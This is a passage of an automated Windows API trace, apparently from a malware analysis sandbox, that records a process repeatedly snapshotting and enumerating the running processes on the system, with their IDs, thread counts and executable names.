lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.580] CloseHandle (hObject=0xbc) returned 1 [0110.580] Sleep (dwMilliseconds=0x12c) [0110.878] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.883] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.932] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.936] CloseHandle (hObject=0xc4) returned 1 [0110.937] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.941] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.942] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.944] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.946] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.947] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.947] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.948] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.949] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.949] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.950] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.951] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.951] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.952] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.953] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.953] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.955] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.956] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.957] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.958] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.973] 